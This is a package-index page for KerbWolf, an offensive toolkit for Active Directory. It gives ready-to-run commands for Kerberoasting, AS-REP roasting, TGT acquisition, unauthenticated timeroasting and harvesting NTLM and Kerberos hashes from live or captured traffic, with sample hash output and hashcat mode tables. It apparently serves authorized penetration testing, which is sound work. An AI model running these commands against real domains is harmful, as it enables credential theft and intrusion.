Kerberos roasting and TGT attack toolkit for Active Directory.
Project description
KerbWolf
Kerberos roasting and hash extraction toolkit for Active Directory.
Guide • Installation • Commands
- Kerberos roasting - extract crackable hashes from Kerberos authentication
- Timeroasting - unauthenticated MS-SNTP hash extraction for computer and gMSA accounts
- Pcap extraction - offline Kerberos, NTLM, and SNTP hash extraction from network captures
Example
Kerberoast every SPN account discovered over LDAP and write hashcat-ready hashes:
$ kw-roast -k -c admin.ccache --ldap
[+] sql_svc $krb5tgs$23$*sql_svc$CORP.LOCAL$MSSQLSvc/db01*<...> (hashcat 13100)
[+] backup_svc $krb5tgs$18$*backup_svc$CORP.LOCAL$cifs/fs01*<...> (hashcat 19700)
[*] 2 SPN accounts roasted -> hashes.txt
Installation
Install with uv:
uv tool install git+https://github.com/StrongWind1/KerbWolf
See the installation guide for development setup and dependencies.
Kerberos roasting
Request encrypted tickets from domain controllers and crack them offline. Supports all 5 Windows encryption types.
| Command | Attack | Auth required |
|---|---|---|
kw-roast |
TGS-REP Roast (Kerberoast) | Yes (password, hash, or ccache) |
kw-asrep |
AS-REP Roast | No (LDAP discovery needs auth) |
kw-tgt |
TGT acquisition (pass-the-key) | Yes |
# Get a TGT
kw-tgt -d CORP.LOCAL --dc-ip 10.0.0.1 -u admin -p 'Password1!' -o admin.ccache
# Kerberoast via LDAP auto-discovery
kw-roast -k -c admin.ccache --ldap
# AS-REP Roast
kw-asrep -d CORP.LOCAL --dc-ip 10.0.0.1 -t jsmith
Features: LDAP enumeration, hashcat + John output, all 5 etypes (DES/RC4/AES128/AES256), ccache auto-detection, DNS SRV resolution, TCP/UDP with auto-fallback.
Timeroasting
Extract password-equivalent hashes from domain controllers via MS-SNTP. No authentication needed - just a valid RID.
| Command | Auth required |
|---|---|
kw-timeroast |
No (LDAP discovery needs auth) |
# Blind RID scan (no auth)
kw-timeroast 10.0.0.1 -r 500-5000 -o hashes.txt
# LDAP discovery + cracking wordlist
kw-timeroast 10.0.0.1 --ldap -d CORP.LOCAL -u admin -p 'Pass!' --wordlist crack.txt
Features: 68-byte MD5 (hashcat 31300) + 120-byte KDF+HMAC-SHA512, current/previous password selection, LDAP discovery of computer + gMSA accounts, cracking wordlist output.
Pcap extraction
Extract all crackable hashes from network captures. One tool, all protocols.
| Command | What it extracts |
|---|---|
kw-extract |
Kerberos (AS-REQ, AS-REP, TGS-REP), SNTP (timeroast), NTLM (NTLMv1, NTLMv1-ESS, NTLMv2, LMv2) |
# Extract everything from a capture
kw-extract capture.pcap -o hashes.txt
# Pipe from tcpdump
tcpdump -i eth0 -w - 'port 88 or port 123 or port 445' | kw-extract -
Kerberos (port 88): AS-REQ pre-auth timestamps, AS-REP encrypted parts, TGS-REP service tickets. All 5 etypes, 15 hash formats.
SNTP (port 123): 68-byte MD5 and 120-byte KDF+HMAC-SHA512 timeroast responses.
NTLM (8 transports): Extracts NTLMv1, NTLMv1-ESS, NTLMv2, and LMv2 hashes with automatic TCP stream reassembly and Type 2/Type 3 connection tracking.
| Transport | Ports | Spec |
|---|---|---|
| SMB | 445, 139 | [MS-SMB], [MS-SMB2] |
| HTTP | 80 | [MS-NTHT] |
| WinRM | 5985, 5986 | [MS-WSMV] |
| LDAP | 389 | SASL/SPNEGO |
| SMTP | 25, 587 | [MS-SMTPNTLM] |
| POP3 | 110 | [MS-POP3] |
| IMAP | 143 | [MS-OXIMAP] |
| Telnet | 23 | [MS-TNAP] |
Attack matrix
Kerberos (15 hash types)
| DES-CBC-CRC (1) | DES-CBC-MD5 (3) | AES128 (17) | AES256 (18) | RC4 (23) | |
|---|---|---|---|---|---|
| AS-REQ | $krb5pa$1$ |
$krb5pa$3$ |
$krb5pa$17$ (19800) |
$krb5pa$18$ (19900) |
$krb5pa$23$ (7500) |
| AS-REP | $krb5asrep$1$ |
$krb5asrep$3$ |
$krb5asrep$17$ (32100) |
$krb5asrep$18$ (32200) |
$krb5asrep$23$ (18200) |
| TGS-REP | $krb5tgs$1$ |
$krb5tgs$3$ |
$krb5tgs$17$ (19600) |
$krb5tgs$18$ (19700) |
$krb5tgs$23$ (13100) |
Numbers in parentheses are hashcat mode numbers. The 9 RC4/AES modes work in hashcat and John today.
Timeroasting (MS-SNTP)
| Format | Algorithm | Hashcat mode |
|---|---|---|
| 68-byte Authenticator | MD5(NTOWFv1 || salt) |
31300 |
| 120-byte ExtendedAuth | KDF(SP800-108, HMAC-SHA512) | proposed |
NTLM (from pcap)
| Type | Hashcat mode |
|---|---|
| Net-NTLMv1 / NTLMv1-ESS | 5500 |
| Net-NTLMv2 / LMv2 | 5600 |
Development
git clone https://github.com/StrongWind1/KerbWolf.git
cd KerbWolf
uv sync # install dev dependencies
make check # run lint + typecheck + tests
make docs # build documentation
make format # auto-fix formatting
make build # build wheel (runs check + docs first)
Credits
Built on Impacket and ldap3. Inspired by Rubeus, GetUserSPNs.py, and hashcat.
Related tools
Other projects in this collection:
- AD-SecretGen - derive AD password hashes and Kerberos keys from a password
- NTDSWolf - offline NTDS.dit parser and credential extractor
- CredWolf - Active Directory credential validation
- Kerberos - Kerberos in Active Directory: protocol, security, and attacks
Disclaimer
KerbWolf is intended for authorized penetration testing, red team engagements, and security audits only. You must have explicit written permission from the system owner before attacking any Active Directory environment. Unauthorized access to computer systems is illegal. The authors are not responsible for any misuse or damage caused by this tool.
License
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file kerbwolf-0.3.0.tar.gz.
File metadata
- Download URL: kerbwolf-0.3.0.tar.gz
- Upload date:
- Size: 589.2 kB
- Tags: Source
- Uploaded using Trusted Publishing? Yes
- Uploaded via: twine/6.1.0 CPython/3.13.13
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
6c2117ec41ea0b9c3a43a2a742c09b0883fe096d13e59db7cf6e3d2a570b5e89
|
|
| MD5 |
4270f921df2b91e553419b3e9cb31fb7
|
|
| BLAKE2b-256 |
5bec6a0b7a0f4c1f4ea3dec74a3d062297977511965a5248bd35810d418ff9b1
|
Provenance
The following attestation bundles were made for kerbwolf-0.3.0.tar.gz:
Publisher:
publish.yml on StrongWind1/KerbWolf
-
Statement:
-
Statement type:
https://in-toto.io/Statement/v1 -
Predicate type:
https://docs.pypi.org/attestations/publish/v1 -
Subject name:
kerbwolf-0.3.0.tar.gz -
Subject digest:
6c2117ec41ea0b9c3a43a2a742c09b0883fe096d13e59db7cf6e3d2a570b5e89 - Sigstore transparency entry: 2121573464
- Sigstore integration time:
-
Permalink:
StrongWind1/KerbWolf@cef628c063af4b648a6e43c272889e7e1f41067e -
Branch / Tag:
refs/tags/v0.3.0 - Owner: https://github.com/StrongWind1
-
Access:
public
-
Token Issuer:
https://token.actions.githubusercontent.com -
Runner Environment:
github-hosted -
Publication workflow:
publish.yml@cef628c063af4b648a6e43c272889e7e1f41067e -
Trigger Event:
release
-
Statement type:
File details
Details for the file kerbwolf-0.3.0-py3-none-any.whl.
File metadata
- Download URL: kerbwolf-0.3.0-py3-none-any.whl
- Upload date:
- Size: 572.4 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? Yes
- Uploaded via: twine/6.1.0 CPython/3.13.13
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
8254f8acb162321aba9db21f0c4f00b4edb8fad1dfda675fdde49fa85cb5be99
|
|
| MD5 |
e568172cb021cf6ce547c2c88c861c34
|
|
| BLAKE2b-256 |
199b5e1801a530f3ab4143ec49d3dc832b37957e4df5a61f6538a5d8a7501c5e
|
Provenance
The following attestation bundles were made for kerbwolf-0.3.0-py3-none-any.whl:
Publisher:
publish.yml on StrongWind1/KerbWolf
-
Statement:
-
Statement type:
https://in-toto.io/Statement/v1 -
Predicate type:
https://docs.pypi.org/attestations/publish/v1 -
Subject name:
kerbwolf-0.3.0-py3-none-any.whl -
Subject digest:
8254f8acb162321aba9db21f0c4f00b4edb8fad1dfda675fdde49fa85cb5be99 - Sigstore transparency entry: 2121573537
- Sigstore integration time:
-
Permalink:
StrongWind1/KerbWolf@cef628c063af4b648a6e43c272889e7e1f41067e -
Branch / Tag:
refs/tags/v0.3.0 - Owner: https://github.com/StrongWind1
-
Access:
public
-
Token Issuer:
https://token.actions.githubusercontent.com -
Runner Environment:
github-hosted -
Publication workflow:
publish.yml@cef628c063af4b648a6e43c272889e7e1f41067e -
Trigger Event:
release
-
Statement type: